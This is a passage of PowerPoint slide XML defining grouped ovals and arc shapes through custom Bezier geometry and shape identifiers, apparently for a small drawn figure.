                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE019526-0F39-E245-89B3-B10AD9A45728}"/>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6" name="Freeform 1170">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD4A4CF6-64F3-3A4C-987C-8F48A4D15DD7}"/>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07" name="Freeform 1171">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8373AF01-C642-4347-8EC8-44710E28B7BE}"/>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8" name="Freeform 1172">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEDAACC6-6FA3-0844-A779-276D30DB8129}"/>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09" name="Rectangle 1173">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11AB12CE-7F52-044C-B19A-B24D97E4C45F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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710" name="Rectangle 1174">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E231FC4A-6053-E64F-AD9B-97E8E3242E35}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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711" name="Group 1175">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1C58DB9-74C8-F34D-B959-EFB1A8CB7F97}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1568" y="370"/>
              <a:ext cx="92" cy="56"/>
              <a:chOff x="820" y="2004"/>
              <a:chExt cx="92" cy="56"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="66712" name="Group 1176">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DEE39A2-5641-154A-8FFE-4D8FD69BA981}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="820" y="2004"/>
                <a:ext cx="92" cy="56"/>
                <a:chOff x="820" y="2004"/>
                <a:chExt cx="92" cy="56"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66713" name="Oval 1177">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54EBA3F0-6BE8-7545-8094-1CD73ABBC753}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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4" name="Oval 1178">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9418DF05-32B8-A541-8898-6821CBBDD316}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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5" name="Oval 1179">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8ECC8C8E-8565-5843-801E-A25DF6D23150}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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6" name="Oval 1180">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1076C9F6-4128-3E43-A2A6-D273A9F3C87E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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7" name="Oval 1181">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{638725C5-F1EE-3848-9506-806D9DA0E5A9}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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8" name="Oval 1182">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15B68DEB-DAF2-A343-8304-3F4DA629C219}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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9" name="Oval 1183">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DB04491-6194-6540-A94E-07344AA6E997}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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0" name="Oval 1184">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{016988E7-1AE6-D14B-BE68-A5197582AE46}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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1" name="Oval 1185">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67C8581A-3E36-204C-A86C-6317002178E6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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722" name="Group 1186">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F023549-9A49-044F-86BE-14FA0EC31D9B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="820" y="2004"/>
                <a:ext cx="92" cy="56"/>
                <a:chOff x="820" y="2004"/>
                <a:chExt cx="92" cy="56"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66723" name="Arc 1187">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{688E6A03-10C2-6647-B987-606E2E2728B6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="853" y="2004"/>
                  <a:ext cx="38" cy="12"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 20812 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 41217"/>
                    <a:gd name="T1" fmla="*/ 15819 h 21600"/>
                    <a:gd name="T2" fmla="*/ 41217 w 41217"/>
                    <a:gd name="T3" fmla="*/ 14515 h 21600"/>
                    <a:gd name="T4" fmla="*/ 20812 w 41217"/>
                    <a:gd name="T5" fmla="*/ 21600 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="41217" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="-1" y="15818"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2596" y="6470"/>
                        <a:pt x="11109" y="0"/>
                        <a:pt x="20812" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="30010" y="0"/>
                        <a:pt x="38199" y="5825"/>
                        <a:pt x="41216" y="14515"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="41217" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="-1" y="15818"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2596" y="6470"/>
                        <a:pt x="11109" y="0"/>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4" name="Arc 1188">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE87F065-FA97-6A4D-8912-C70BFD65831C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="854" y="2005"/>
                  <a:ext cx="36" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 20757 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 41081"/>
                    <a:gd name="T1" fmla="*/ 15624 h 21600"/>
                    <a:gd name="T2" fmla="*/ 41081 w 41081"/>
                    <a:gd name="T3" fmla="*/ 14286 h 21600"/>
                    <a:gd name="T4" fmla="*/ 20757 w 41081"/>
                    <a:gd name="T5" fmla="*/ 21600 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="41081" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="15624"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2663" y="6372"/>
                        <a:pt x="11129" y="0"/>
                        <a:pt x="20757" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29866" y="0"/>
                        <a:pt x="37996" y="5714"/>
                        <a:pt x="41081" y="14285"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="41081" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="15624"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2663" y="6372"/>
                        <a:pt x="11129" y="0"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66725" name="Arc 1189">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCEC163C-1931-C043-B4EA-8EFC2A2C49AB}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="830" y="2010"/>
                  <a:ext cx="23" cy="14"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 419 w 33372"/>
                    <a:gd name="T1" fmla="*/ 25836 h 25836"/>
                    <a:gd name="T2" fmla="*/ 33372 w 33372"/>
                    <a:gd name="T3" fmla="*/ 3490 h 25836"/>
                    <a:gd name="T4" fmla="*/ 21600 w 33372"/>
                    <a:gd name="T5" fmla="*/ 21600 h 25836"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="33372" h="25836" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="419" y="25835"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="24441"/>
                        <a:pt x="0" y="23022"/>
                        <a:pt x="0" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9670"/>
                        <a:pt x="9670" y="0"/>
                        <a:pt x="21600" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25779" y="0"/>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6" name="Arc 1190">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E56F2C39-652D-5C45-96A8-AE3DA3A8F6DA}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="831" y="2011"/>
                  <a:ext cx="22" cy="13"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 434 w 33223"/>
                    <a:gd name="T1" fmla="*/ 25910 h 25910"/>
                    <a:gd name="T2" fmla="*/ 33223 w 33223"/>
                    <a:gd name="T3" fmla="*/ 3394 h 25910"/>
                    <a:gd name="T4" fmla="*/ 21600 w 33223"/>
                    <a:gd name="T5" fmla="*/ 21600 h 25910"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="33223" h="25910" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="434" y="25909"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="24491"/>
                        <a:pt x="0" y="23047"/>
                        <a:pt x="0" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9670"/>
                        <a:pt x="9670" y="0"/>
                        <a:pt x="21600" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25718" y="0"/>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727" name="Arc 1191">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11194C51-64B6-354C-A831-A4B632CAAC1B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="826"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8" name="Arc 1192">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADDD3156-477A-1847-92A9-A6102B7CE20B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="827"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729" name="Arc 1193">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44C0F16B-D2B7-8444-95D6-F9A39EE1830C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="890" y="2010"/>
                  <a:ext cx="18" cy="14"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 4526 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 26126"/>
                    <a:gd name="T1" fmla="*/ 479 h 32795"/>
                    <a:gd name="T2" fmla="*/ 22998 w 26126"/>
                    <a:gd name="T3" fmla="*/ 32795 h 32795"/>
                    <a:gd name="T4" fmla="*/ 4526 w 26126"/>
                    <a:gd name="T5" fmla="*/ 21600 h 32795"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="26126" h="32795" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="479"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1487" y="160"/>
                        <a:pt x="3004" y="0"/>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0"/>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0" name="Arc 1194">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E244CB41-B5DF-BF40-81B9-8F54900D3739}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="890" y="2011"/>
                  <a:ext cx="17" cy="12"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 4319 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 25919"/>
                    <a:gd name="T1" fmla="*/ 436 h 33197"/>
                    <a:gd name="T2" fmla="*/ 22542 w 25919"/>
                    <a:gd name="T3" fmla="*/ 33197 h 33197"/>
                    <a:gd name="T4" fmla="*/ 4319 w 25919"/>
                    <a:gd name="T5" fmla="*/ 21600 h 33197"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="25919" h="33197" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="436"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1421" y="146"/>
                        <a:pt x="2868" y="0"/>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0"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66731" name="Arc 1195">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E53610CD-19E0-554A-9A6C-53C2921D0652}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="896" y="2024"/>
                  <a:ext cx="16" cy="13"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 0 0 0"/>
                    <a:gd name="G1" fmla="+- 16594 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 13828 w 21600"/>
                    <a:gd name="T1" fmla="*/ 0 h 28809"/>
                    <a:gd name="T2" fmla="*/ 17814 w 21600"/>
                    <a:gd name="T3" fmla="*/ 28809 h 28809"/>
                    <a:gd name="T4" fmla="*/ 0 w 21600"/>
                    <a:gd name="T5" fmla="*/ 16594 h 28809"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>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2" name="Arc 1196">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A1068BA-AAAF-A147-B74D-BEAE1CDD9CC5}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="896" y="2025"/>
                  <a:ext cx="15" cy="12"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 0 0 0"/>
                    <a:gd name="G1" fmla="+- 16867 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 13493 w 21600"/>
                    <a:gd name="T1" fmla="*/ 0 h 29422"/>
                    <a:gd name="T2" fmla="*/ 17577 w 21600"/>
                    <a:gd name="T3" fmla="*/ 29422 h 29422"/>
                    <a:gd name="T4" fmla="*/ 0 w 21600"/>
                    <a:gd name="T5" fmla="*/ 16867 h 29422"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66733" name="Arc 1197">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B37063D-61BC-3B41-8EDB-623CEE7FE718}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="890" y="2037"/>
                  <a:ext cx="20" cy="19"/>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4" name="Arc 1198">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1397813A-DDFC-264E-BA45-051B832FFF86}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="891" y="2037"/>
                  <a:ext cx="18" cy="18"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66735" name="Arc 1199">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E3E46A3-81E0-1040-97BF-E7038D7874AD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="820" y="2024"/>
                  <a:ext cx="10" cy="17"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21528 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 13091 w 21600"/>
                    <a:gd name="T1" fmla="*/ 41382 h 41382"/>
                    <a:gd name="T2" fmla="*/ 19839 w 21600"/>
                    <a:gd name="T3" fmla="*/ 0 h 41382"/>
                    <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                    <a:gd name="T5" fmla="*/ 21528 h 41382"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="41382" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="13091" y="41381"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5149" y="37977"/>
                        <a:pt x="0" y="30168"/>
                        <a:pt x="0" y="21528"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="10281"/>
                        <a:pt x="8629" y="916"/>
                        <a:pt x="19838" y="-1"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="21600" h="41382" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="13091" y="41381"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5149" y="37977"/>
                        <a:pt x="0" y="30168"/>
                        <a:pt x="0" y="21528"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0"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6" name="Arc 1200">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7B1F317-8339-B44F-83FB-CCA41CC81E15}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="821" y="2025"/>
                  <a:ext cx="9" cy="15"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21530 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 13180 w 21600"/>
                    <a:gd name="T1" fmla="*/ 41421 h 41421"/>
                    <a:gd name="T2" fmla="*/ 19860 w 21600"/>
                    <a:gd name="T3" fmla="*/ 0 h 41421"/>
